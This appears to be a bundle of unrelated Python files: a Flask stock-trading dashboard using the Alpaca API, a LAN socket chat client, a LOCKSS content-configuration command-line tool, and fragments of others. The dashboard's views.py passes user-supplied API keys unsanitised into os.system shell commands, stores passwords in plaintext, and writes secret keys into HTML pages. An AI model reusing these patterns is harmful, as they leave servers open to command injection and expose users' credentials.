parser.add_argument('-v', '--verbose', action='store_true', help='show debug output')
parser.add_argument('-w',
'--wait-until',
dest='wait_until',
choices=['load', 'domcontentloaded', 'networkidle0', 'networkidle2'],
help='When to consider a pageload finished')
args = parser.parse_args()
setup_logger(args.verbose)
try:
ctx = BrowserContext()
print(ctx.process(args.url, wait_until=args.wait_until))
finally:
ctx.close()
if __name__ == '__main__':
main()
|
views.py
|
# -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
# Python modules
import fnmatch
import os, logging
# Flask modules
import threading
import requests
from flask import render_template, request, url_for, redirect, send_from_directory, session, Response, flash
from flask_login import login_user, logout_user, current_user, login_required
from werkzeug.exceptions import HTTPException, NotFound, abort
import alpaca_trade_api as tradeapi
import datetime
import random
from datetime import date
from dateutil.relativedelta import relativedelta
# App modules
import pandas as pd
from yahoo_fin.stock_info import get_data
from yahoo_fin.stock_info import get_day_gainers
import sys
import trace
from app import app, lm, db, bc
from app.models import User
from app.forms import LoginForm, RegisterForm
from StratusDashboard.app.forms import APIForm
userlist = {}
def findtopstock():
url = 'https://finance.yahoo.com/screener/predefined/most_actives'
read = pd.read_html(url)[0]
symbols = read['Symbol'][0]
change = read['% Change'][0]
return symbols, change
def findgainer():
url = 'https://finance.yahoo.com/gainers'
read = pd.read_html(url)[0]
symbols = read['Symbol']
change = read['% Change']
price = read['Price (Intraday)']
return symbols, change, price
def findReplace(directory, find, replace, filePattern):
for path, dirs, files in os.walk(os.path.abspath(directory)):
for filename in fnmatch.filter(files, filePattern):
filepath = os.path.join(path, filename)
with open(filepath) as f:
s = f.read()
s = s.replace(find, replace)
with open(filepath, "w") as f:
f.write(s)
f.close()
def human_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000.0
# add more suffixes if you need them
return '%.2f%s' % (num, ['', 'K', 'M', 'G', 'T', 'P'][magnitude])
lfcount = 0
def replace(apikey, apisecret, apiurl):
api = tradeapi.REST(apikey, apisecret, apiurl)
one_month = date.today() + relativedelta(hours=-5)
indexreturn = ''
resstock = ''
daygraph = []
jsquery = ''
ccount = 0
numblist = []
topstocklist = []
openpositions = []
domain = 'StratusDashboard.githubemploy.repl.co'
account = api.get_account()
gainer, gainerchange, gainerprice = findgainer()
lastMonth = (datetime.date.today().replace(day=1) - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
lastdate = api.get_portfolio_history(date_start=lastMonth, date_end=datetime.date.today(), period=None,
timeframe='15Min')
dayrundict = api.get_portfolio_history(date_start=str(str(datetime.date.today()).split('-')[0]) + '-' + str(str(datetime.date.today()).split('-')[1]) + '-' + str(int(str(datetime.date.today()).split('-')[2])-1), date_end=datetime.date.today(), period=None, timeframe='15Min').df.to_dict()['equity'].values()
balance_change = str(round(float(account.equity) - float(account.last_equity), 2))
print(balance_change)
topstock, stockchange = findtopstock()
topstockdata = get_data(topstock, start_date = str(one_month), end_date = datetime.date.today(), index_as_date = True, interval = "1d").to_dict()['open'].values()
for item in topstockdata:
topstocklist.append(item)
for loop in range(0, 6, 1):
numblist.append(str(random.randint(0,18)))
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/templates/pages/index.html', 'r') as reader:
for line in reader:
indexreturn = indexreturn + line
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/static/assets/js/argon.js', 'r') as reader:
for line in reader:
jsquery = jsquery + line
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/static/assets/js/argon.js', 'w+') as reader:
jsquery = jsquery.replace('[0, 20, 10, 30, 15, 40, 20, 60, 60]', str(numblist))
reader.write(jsquery)
with open('/Users/mohit/PycharmProjects/SerpentAI/StratusDashboard/app/templates/newpages/index.html', 'w+') as writer:
if float(account.buying_power) <= float(list(lastdate.df.to_dict()['equity'].values())[0]):
resacc = "fas fa-arrow-down"
accolor = 'text-danger mr-2'
if float(account.buying_power) > float(list(lastdate.df.to_dict()['equity'].values())[0]):
resacc = "fa fa-arrow-up"
accolor = 'text-success mr-2'
if str(''.join([i for i in stockchange if not i.isdigit()])).strip().replace('.', '').replace('%', '') == '-':
resstock = "fas fa-arrow-down"
stockcolor = 'text-danger mr-2'
if str(''.join([i for i in stockchange if not i.isdigit()])).strip().replace('.', '').replace('%', '') == '+':
resstock = "fa fa-arrow-up"
stockcolor = 'text-success mr-2'
stockchange = str(stockchange).replace('+', '').replace('-', '')
portfolio = api.list_positions()
# Print the quantity of shares for each position.
for position in portfolio:
openpositions.append(str(position.symbol))
sendvar = str(indexreturn).replace('REPLACEACCOUNTVALUE', str(account.buying_power) + '$').replace('ACCARROW', resacc).replace('ACCPERCENT', str(human_format(abs(float(account.buying_power) - float(list(lastdate.df.to_dict()['equity'].values())[0]))))).replace('PROFITLOSS', str(balance_change)).replace('REPLACESTOCK', topstock).replace('REPLACECHANGE', str(stockchange)).replace('RESSTOCK', resstock).replace('TEXTSTOCK', stockcolor).replace('ACCOLOR', accolor).replace('OPENPOSITIONS', str(len(openpositions))+' Stock(s)')
sendvar = sendvar.replace('REPLACEDAILYDATA', str(topstocklist))
for item in api.list_orders(status='closed', limit=5):
ccount = ccount + 1
sendvar = sendvar.replace('ITEM'+str(ccount), str(item.symbol))
sendvar = sendvar.replace('SHARES'+str(ccount), str(item.qty))
sendvar = sendvar.replace('SIDE'+str(ccount), str(item.side))
if str(item.side) == 'buy':
sendvar = sendvar.replace('CLASS'+str(ccount), 'fas fa-arrow-up text-success mr-3')
else:
sendvar = sendvar.replace('CLASS'+str(ccount), 'fas fa-arrow-down text-warning mr-3')
sendvar = sendvar.replace('TYPE'+str(ccount), str(item.time_in_force))
#print(item.symbol, item.qty, item.side, item.time_in_force)
for loop in range(0, 6, 1):
#print(str(str(gainerchange[loop]).replace('%', '').replace('+', '').replace('-', '').strip()))
sendvar = sendvar.replace('GAINPRICE'+str(loop), str(gainerprice[loop])+'$')
sendvar = sendvar.replace('GAINSTOCK'+str(loop), gainer[loop])
sendvar = sendvar.replace('GAINPERCENT'+str(loop), str(str(gainerchange[loop]).replace('%', '').replace('+', '').replace('-', '').strip()))
sendvar = sendvar.replace('DOMAINPORT', domain).replace('APIKEY', apikey).replace('APISECRET', apisecret).replace('APIURL', apiurl)
writer.write(sendvar)
session = {}
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.route('/startform.html', methods=['GET', 'POST'])
def startform():
form = APIForm(request.form)
if form.validate() or request.method == "POST":
session['apikey'] = str(form.pubapi.data)
session['secretkey'] = str(form.secapi.data)
session['urlkey'] = str(form.urlapi.data)
print(form.pubapi.data, form.secapi.data, form.urlapi.data)
return redirect('/start.html')
return render_template('layouts/api-default.html', content=render_template('pages/startform.html', form=form))
#return render_template('pages/startform.html', form=form)
@app.route('/start.html')
def start():
try:
apikey = session['apikey']
except:
return render_template('layouts/api-default.html', content=render_template('pages/404.html'))
privatekey = session['secretkey']
apiurl = session['urlkey']
usedir = str('user' + apikey)
isDirectory = os.path.isdir(usedir)
runyn = True
def runuser():
os.system('cd ' + usedir + ' && python RunFile.py')
if isDirectory == True:
userlist[apikey] = threading.Thread(target=runuser)
userlist[apikey].start()
elif isDirectory == False:
replace(str(apikey), str(privatekey), str(apiurl))
os.system('git clone https://github.com/GitHubEmploy/SuperSimpleAITrading.git '+usedir)
findReplace(str(str('user') + str(apikey)), "publicapikey", apikey, "*.csv")
findReplace(str(str('user') + str(apikey)), "secretapikey", privatekey, "*.csv")
findReplace(str(str('user') + str(apikey)), "usageurl", apiurl, "*.csv")
userlist[apikey] = threading.Thread(target=runuser)
userlist[apikey].start()
return render_template('layouts/api-default.html', content=render_template('pages/startedproc.html'))
# Logout user
@app.route('/logout.html')
def logout():
logout_user()
form = LoginForm(request.form)
return redirect("/login.html")
# Register a new user
@app.route('/register.html', methods=['GET', 'POST'])
def register():
# declare the Registration Form
form = RegisterForm(request.form)
msg = None
if request.method == 'GET':
return render_template('layouts/auth-default.html',
content=render_template('pages/register.html', form=form, msg=msg))
# check if both http method is POST and form is valid on submit
if form.validate_on_submit():
# assign form data to variables
username = request.form.get('username', '', type=str)
password = request.form.get('password', '', type=str)
email = request.form.get('email', '', type=str)
# filter User out of database through username
user = User.query.filter_by(user=username).first()
# filter User out of database through username
user_by_email = User.query.filter_by(email=email).first()
if user or user_by_email:
msg = 'Error: User exists!'
else:
pw_hash = password # bc.generate_password_hash(password)
user = User(username, email, pw_hash)
user.save()
msg = 'User created, please <a href="' + url_for('login') + '">login</a>'
else:
msg = 'Input error'
return render_template('layouts/auth-default.html',
content=render_template('pages/register.html', form=form, msg=msg))
# Authenticate user
@app.route('/login.html', methods=['GET', 'POST'])
def login():
# Declare the login form
form = LoginForm(request.form)
# Flask message injected into the page, in case of any errors
msg = None
# check if both http method is POST and form is valid on submit
if form.validate_on_submit():
# assign form data to variables
username = request.form.get('username', '', type=str)
password = request.form.get('password', '', type=str)
# filter User out of database through username
user = User.query.filter_by(user=username).first()
if user:
# if bc.check_password_hash(user.password, password):
if user.password == password:
login_user(user)
return redirect('/')
else:
msg = "Wrong password. Please try again."
else:
msg = "Unkown user"
return render_template('layouts/auth-default.html',
content=render_template('pages/login.html', form=form, msg=msg))
@app.route('/status.html', methods=['GET', 'POST'])
def statusapi():
apikey = session['apikey']
try:
userlist[apikey].isAlive()
return render_template('layouts/api-default.html', content=render_template('pages/apialive.html'))
except:
try:
return render_template('layouts/api-default.html', content=render_template('pages/apinotalive.html'))
except:
return render_template('layouts/api-default.html', content=render_template('pages/404.html'))
@app.route('/stop.html', methods=['GET', 'POST'])
def stopapi():
apikey = session['apikey']
runyn = False
return render_template('layouts/api-default.html', content=render_template('pages/stopapi.html'))
#return 'Stopping Process Gracefully, this may take up to 10 minutes. Please be patient.'
@app.route('/', methods=['GET', 'POST'])
def default():
if not current_user.is_authenticated:
return redirect(url_for('login'))
form = APIForm(request.form)
if form.validate() or request.method == "POST":
try:
session['apikey'] = str(form.pubapi.data)
session['secretkey'] = str(form.secapi.data)
session['urlkey'] = str(form.urlapi.data)
replace(str(form.pubapi.data), str(form.secapi.data), str(form.urlapi.data))
except:
return render_template('layouts/api-default.html', content=render_template('pages/invalidapi.html', form=form, msg='Invalid API Keys/Combination. Visit https://alpaca.markets to get your API Keys!'))
#print(form.pubapi.data, form.secapi.data, form.urlapi.data)
return render_template('layouts/default.html', content=render_template('newpages/index.html'))
return render_template('layouts/api-default.html', content=render_template('pages/startform.html', form=form))
# print(str(indexreturn).replace('REPLACESERVERSTATUS', str(account.buying_power)))
@app.route('/<path>')
def index(path):
return render_template('layouts/auth-default.html',
content=render_template( 'pages/404.html' ) )
# Return sitemap
@app.route('/sitemap.xml')
def sitemap():
return send_from_directory(os.path.join(app.root_path, 'static'), 'sitemap.xml')
|
run_client.py
|
import socket
import sys
from time import sleep
from threading import Thread
import os
kill = False
s = socket.socket()
print("Connected to IP: " + "Server" + ":" + "9999")
print("Wrap commands in %/%.")
global hist
hist = []
sender_h = []
def refresh():
prev_sender = ""
os.system('cls' if os.name == 'nt' else 'clear')
print("Connected to IP: " + "Server" + ":" + "9999")
print("_______________________________________________")
for text, i in zip(hist, range(len(hist))):
if(prev_sender != sender_h[i]):
print()
print(sender_h[i] + ": ")
print(" " + text)
else:
print(" " + text)
prev_sender = sender_h[i]
def send_txt():
hist = []
sender_h = []
while True and not kill:
inp = input()
try:
s.send(str.encode(inp))
hist.append(inp)
sender_h.append("You")
refresh()
if(inp == "%cls%"):
hist = []
sender_h = []
refresh()
except:
if(kill):
sys.exit()
sleep(1)
s.send(str.encode(inp))
hist.append(inp)
sender_h.append("You")
refresh()
if(inp == "%cls%"):
hist.clear()
sender_h.clear()
refresh()
s.connect(("192.168.0.23", 9999))
sn = Thread(target=send_txt)
sn.start()
while True:
data = s.recv(1024)
if(len(data) > 0):
m = data.decode("utf=8")
if(m == "%quit%"):
print("Server has gone offline. Enter enter to exit.")
kill = True
s.close()
sys.exit()
break
elif(m == "%cls%"):
pass
else:
hist.append(m)
sender_h.append("192.168.0.23")
refresh()
|
contentconfigurationservice.py
|
#!/usr/bin/env python2
'''A library and a command line tool to interact with the LOCKSS daemon's
content configuration service via its Web Services API.'''
__copyright__ = '''\
Copyright (c) 2000-2016, Board of Trustees of Leland Stanford Jr. University
All rights reserved.'''
__license__ = '''\
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.'''
__version__ = '0.2.2'
import getpass
import itertools
from multiprocessing import Pool as ProcessPool
from multiprocessing.dummy import Pool as ThreadPool
from optparse import OptionGroup, OptionParser
import os.path
import sys
from threading import Lock, Thread
import ContentConfigurationServiceImplService_client
from wsutil import zsiauth
#
# Library
#
def add_au_by_id(host, auth, auid):
'''
Performs an addAuById operation (which adds a single AU on a single host, by
AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.addAuById()
req.AuId = auid
return _ws_port(host, auth).addAuById(req).Return
def add_aus_by_id_list(host, auth, auids):
'''
Performs an addAusByIdList operation (which adds all given AUs on a single
host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.addAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).addAusByIdList(req).Return
def deactivate_au_by_id(host, auth, auid):
'''
Performs a deactivateAuById operation (which deactivates a single AU on a
single host, by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.deactivateAuById()
req.AuId = auid
return _ws_port(host, auth).deactivateAuById(req).Return
def deactivate_aus_by_id_list(host, auth, auids):
'''
Performs a deactivateAusByIdList operation (which deactivates all given AUs on
a single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.deactivateAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).deactivateAusByIdList(req).Return
def delete_au_by_id(host, auth, auid):
'''
Performs a deleteAuById operation (which deletes a single AU on a single host,
by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.deleteAuById()
req.AuId = auid
return _ws_port(host, auth).deleteAuById(req).Return
def delete_aus_by_id_list(host, auth, auids):
'''
Performs a deleteAusByIdList operation (which deletes all given AUs on a
single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.deleteAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).deleteAusByIdList(req).Return
def reactivate_au_by_id(host, auth, auid):
'''
Performs a reactivateAuById operation (which reactivates a single AU on a
single host, by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.reactivateAuById()
req.AuId = auid
return _ws_port(host, auth).reactivateAuById(req).Return
def reactivate_aus_by_id_list(host, auth, auids):
'''
Performs a reactivateAusByIdList operation (which reactivates all given AUs on
a single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.reactivateAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).reactivateAusByIdList(req).Return
def _ws_port(host, auth, tracefile=None):
'''
Internal convenience method used to set up a Web Services Port.
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- tracefile (file object): an optional trace file (default None for no trace)
'''
url = 'http://%s/ws/ContentConfigurationService' % (host,)
locator = ContentConfigurationServiceImplService_client.ContentConfigurationServiceImplServiceLocator()
if tracefile is None: return locator.getContentConfigurationServiceImplPort(url=url, auth=auth)
else: return locator.getContentConfigurationServiceImplPort(url=url, auth=auth, tracefile=tracefile)
#
# Command line tool
#
__tutorial__ = '''\
INTRODUCTION
This tool can be used to add, delete, activate and deactivate AUs on one or more
LOCKSS hosts. Invoking the tool consists of four parts:
- Specify the target hosts. Each occurrence of --host=HOST adds the host:port
pair HOST to the list of target hosts, and each occurrence of --hosts=HFILE adds
the host:port pairs in the file HFILE to the list of target hosts. HFILE can
contain comments, which begin at the character '#' and extend to the end of the
line. At least one target host is required. You will be prompted for a username
and password unless you pass them via --username and --password.
- Specify the target AUIDs. Likewise, each occurrence of --auid=AUID adds the
given AUID to the list of target AUIDs, and each occurrence of --auids=AFILE
adds the AUIDs in the file AFILE to the list of target AUIDs. AFILE can also
contain comments. At least one target AUID is required.
- Specify the desired operation. This is done by using exactly one of --add-aus,
--delete-aus, --deactivate-aus or --reactivate-aus.
- Optionally specify output options (see below).
OUTPUT
This tool can produce two styles of output: text output with --text-output and
tabular output with --table-output. By default, --text-output is in effect,
unless --table-output is explicitly specified.
When --text-output is in effect, unsuccessful operations are output one per line
on the console, host by host. You can additionally specify --verbose, in which
case all successful operations are also displayed host by host. The --verbose
option is only valid if --text-output is in effect.
When --table-output is in effect, a tab-separated table of unsuccessful
operations is output to the console, one row per target AU with at least one
unsuccessful operation and one column per target host.
In either output mode, the order of AUs listed (for each host in text mode, for
the whole table in tabular mode) is dictated by --sort-by-auid (AUID) or
--sort-by-name (AU name). By default, --sort-by-name is in effect, unless
--sort-by-auid is explicitly specified. Likewise, the way AUs are displayed is
governed by --list-by-auid (show the AUID), --list-by-name (show the AU name),
or --list-by-both (show the name and the AUID separated by a tab). By default,
--list-by-both is in effect unless another option in this category is specified.
The listing by name is currently just a string comparison, not a clever library
sort like in the LOCKSS daemon.
EXAMPLES
$ scripts/ws/contentconfigurationservice --host=foo.university.edu:8081 --auid=aaaaa1 --add-aus
Adds the AUID aaaaa1 to foo.university.edu:8081. Produces text output (the
default) only if the operation does not succeed.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed as a
name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --verbose
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default), both of successful
operations and unsuccessful operations. AUs are sorted by AU name (the default)
and displayed as a name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --list-by-name
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed by AU name.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --sort-by-auid --list-by-auid
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AUID and displayed by AUID.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --table-output
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. If any operation does not succeed, prints a table of
unsuccessful operations where each row is an AU and each column is a host. The
rows are sorted by AU name (the default) and displayed as a name-AUID pair (the
default).'''
class _ContentConfigurationServiceOptions(object):
'''An internal object to encapsulate options suitable for this tool.'''
@staticmethod
def make_parser():
'''Static method to make a command line parser suitable for this tool.'''
usage = '%prog {--host=HOST|--hosts=HFILE}... {--auid=AUID|--auids=AFILE}... {--add-aus|--deactivate-aus|--delete-aus|--reactivate-aus} [OPTIONS]'
parser = OptionParser(version=__version__, description=__doc__, usage=usage)
# Top-level options
parser.add_option('--copyright', action='store_true', help='display copyright and exit')
parser.add_option('--license', action='store_true', help='display software license and exit')
parser.add_option('--tutorial', action='store_true', help='display tutorial and exit')
# Hosts
group = OptionGroup(parser, 'Target hosts')
group.add_option('--host', action='append', default=list(), help='add host:port pair to list of target hosts')
group.add_option('--hosts', action='append', default=list(), metavar='HFILE', help='add host:port pairs in HFILE to list of target hosts')
group.add_option('--password', metavar='PASS', help='UI password (default: interactive prompt)')
group.add_option('--username', metavar='USER', help='UI username (default: interactive prompt)')
parser.add_option_group(group)
# AUIDs
group = OptionGroup(parser, 'Target AUIDs')
group.add_option('--auid', action='append', default=list(), help='add AUID to list of target AUIDs')
group.add_option('--auids', action='append', default=list(), metavar='AFILE', help='add AUIDs in AFILE to list of target AUIDs')
parser.add_option_group(group)
# Content configuration operations
group = OptionGroup(parser, 'Content configuration operations')
group.add_option('--add-aus', action='store_true', help='add target AUs to target hosts')
group.add_option('--deactivate-aus', action='store_true', help='deactivate target AUs on target hosts')
group.add_option('--delete-aus', action='store_true', help='delete target AUs from target hosts')
group.add_option('--reactivate-aus', action='store_true', help='reactivate target AUs on target hosts')
parser.add_option_group(group)
# Output options
group = OptionGroup(parser, 'Output options')
group.add_option('--list-by-auid', action='store_true', help='list output by AUID')
group.add_option('--list-by-both', action='store_true', help='list output by both AU name and AUID (default)')
group.add_option('--list-by-name', action='store_true', help='list output by AU name')
group.add_option('--sort-by-auid', action='store_true', help='sort output by AUID')
group.add_option('--sort-by-name', action='store_true', help='sort output by AU name (default)')
group.add_option('--table-output', action='store_true', help='produce tabular output')
group.add_option('--text-output', action='store_true', help='produce text output (default)')
group.add_option('--verbose', action='store_true', default=False, help='make --text-output verbose (default: %default)')
parser.add_option_group(group)
# Job pool
group = OptionGroup(parser, 'Job pool')
group.add_option('--pool-size', metavar='SIZE', type='int', default=0, help='size of the job pool, 0 for unlimited (default: %default)')
group.add_option('--process-pool', action='store_true', help='use a process pool')
group.add_option('--thread-pool', action='store_true', help='use a thread pool (default)')
parser.add_option_group(group)
# Other options
group = OptionGroup(parser, 'Other options')
group.add_option('--batch-size', metavar='SIZE', type='int', default=100, help='size of AUID batches (default: %default)')
parser.add_option_group(group)
return parser
def __init__(self, parser, opts, args):
'''
Constructor.
Parameters:
- parser (OptionParser instance): the option parser
- opts (Options instance): the Options instance returned by the parser
- args (list of strings): the remaining command line arguments returned by
the parser
'''
super(_ContentConfigurationServiceOptions, self).__init__()
self.errors = 0
# Special options
if opts.copyright: print __copyright__
if opts.license: print __license__
if opts.tutorial: print __tutorial__
if any([opts.copyright, opts.license, opts.tutorial]): sys.exit()
# General checks
if len(args) > 0:
parser.error('unexpected command line arguments: %s' % (' '.join(args),))
if len(filter(None, [opts.add_aus, opts.deactivate_aus, opts.delete_aus, opts.reactivate_aus])) != 1:
parser.error('exactly one of --add-aus, --deactivate-aus, --delete-aus, --reactivate-aus is required')
if len(filter(None, [opts.table_output, opts.text_output])) > 1:
parser.error('at most one of --table-output, --text-output can be specified')
# hosts
self.hosts = opts.host[:]
for f in opts.hosts: self.hosts.extend(_file_lines(f))
if len(self.hosts) == 0: parser.error('at least one target host is required')
# auids
self.auids = opts.auid[:]
for f in opts.auids: self.auids.extend(_file_lines(f))
if len(self.auids) == 0: parser.error('at least one target AUID is required')
# au_operation
if opts.add_aus: self.au_operation = add_aus_by_id_list
elif opts.deactivate_aus: self.au_operation = deactivate_aus_by_id_list
elif opts.delete_aus: self.au_operation = delete_aus_by_id_list
else: self.au_operation = reactivate_aus_by_id_list
# table_output/text_output/keysort/keydisplay/verbose
self.table_output = opts.table_output
self.text_output = not self.table_output
if opts.sort_by_auid: self.keysort = _sort_by_auid
else: self.keysort = _sort_by_name # default is --sort-by-name
if opts.list_by_auid: self.keydisplay = _list_by_auid
elif opts.list_by_name: self.keydisplay = _list_by_name
else: self.keydisplay = _list_by_both # default is --list-by-both
if self.text_output:
self.verbose = opts.verbose
elif opts.verbose:
parser.error('--verbose can only be specified with --text-output')
# pool_class/pool_size/batch_size
if opts.process_pool and opts.thread_pool:
parser.error('--process-pool and --thread-pool are mutually exclusive')
self.pool_class = ProcessPool if opts.process_pool else ThreadPool
self.pool_size = opts.pool_size or len(self.hosts)
self.batch_size = opts.batch_size
# auth
u = opts.username or getpass.getpass('UI username: ')
p = opts.password or getpass.getpass('UI password: ')
self.auth = zsiauth(u, p)
# This is to allow pickling, so the process pool works, but this isn't great
# Have the sort and list params be enums and have keysort and keydisplay be methods?
def _sort_by_name(t): return t
def _sort_by_auid(t): return (t[1], t[0])
def _list_by_auid(t): return (t[1],) if t else ['AUID']
def _list_by_name(t): return (t[0],) if t else ['AU name']
def _list_by_both(t): return t if t else ['AU name', 'AUID']
def _do_au_operation_job(options_host):
options, host = options_host
data = dict()
errors = 0
for i in xrange(0, len(options.auids), options.batch_size):
result = options.au_operation(host, options.auth, options.auids[i:i+options.batch_size])
for r in result:
if r.IsSuccess: msg = None
else:
msg = (r.Message or '').partition(':')[0]
errors = errors + 1
data[((r.Name, r.Id), (host,))] = msg
return (host, data, errors)
def _do_au_operation(options):
data = dict()
pool = options.pool_class(options.pool_size)
jobs = [(options, _host) for _host in options.hosts]
for host, result, errors in pool.imap_unordered(_do_au_operation_job, jobs):
data.update(result)
options.errors = options.errors + errors
if options.text_output:
for host in sorted(options.hosts):
hostresults = [(k[0], v) for k, v in data.iteritems() if k[1] == host]
if options.verbose:
successful = filter(lambda x: x[1] is None, hostresults)
if len(successful) > 0:
_output_record(options, ['Successful on %s:' % (host,)])
for x in sorted(successful, key=options.keysort):
_output_record(options, options.keydisplay(x[0]))
_output_record(options, [])
unsuccessful = filter(lambda x: x[1] is not None, hostresults)
if len(unsuccessful) > 0:
_output_record(options, ['Unsuccessful on %s:' % (host,)])
for x in sorted(unsuccessful, key=options.keysort):
_output_record(options, options.keydisplay(x[0]) + (x[1],))
_output_record(options, [])
else:
display = dict([((options.keydisplay(k[0]), k[1]), v) for k, v in data.iteritems()])
_output_table(options, display, options.keydisplay(None), [options.hosts])
# Last modified 2015-08-05
def _output_record(options, lst):
'''Internal method to display a single record.'''
print '\t'.join([str(x or '') for x in lst])
# Last modified 2016-05-16
def _output_table(options, data, rowheaders, lstcolkeys, rowsort=None):
'''Internal method to display tabular output. (Should be refactored.)'''
colkeys = [x for x in itertools.product(*lstcolkeys)]
for j in xrange(len(lstcolkeys)):
if j < len(lstcolkeys) - 1: rowpart = [''] * len(rowheaders)
else: rowpart = rowheaders
_output_record(options, rowpart + [x[j] for x in colkeys])
for rowkey in sorted(set([k[0] for k in data]), key=rowsort):
_output_record(options, list(rowkey) + [data.get((rowkey, colkey)) for colkey in colkeys])
# Last modified 2015-08-31
def _file_lines(fstr):
with open(os.path.expanduser(fstr)) as f: ret = filter(lambda y: len(y) > 0, [x.partition('#')[0].strip() for x in f])
if len(ret) == 0: sys.exit('Error: %s contains no meaningful lines' % (fstr,))
return ret
def _main():
'''Main method.'''
# Parse command line
parser = _ContentConfigurationServiceOptions.make_parser()
(opts, args) = parser.parse_args()
options = _ContentConfigurationServiceOptions(parser, opts, args)
# Dispatch
t = Thread(target=_do_au_operation, args=(options,))
t.daemon = True
t.start()
while True:
t.join(1.5)
if not t.is_alive(): break
# Errors
if options.errors > 0: sys.exit('%d %s; exiting' % (options.errors, 'error' if options.errors == 1 else 'errors'))
# Main entry point
if __name__ == '__main__': _main()
|
playlist.py
|
import json
import threading
import logging
import random
import time
import variables as var
from media.cache import (CachedItemWrapper, ItemNotCachedError,
get_cached_wrapper_from_dict, get_cached_wrapper_by_id)
from database import Condition
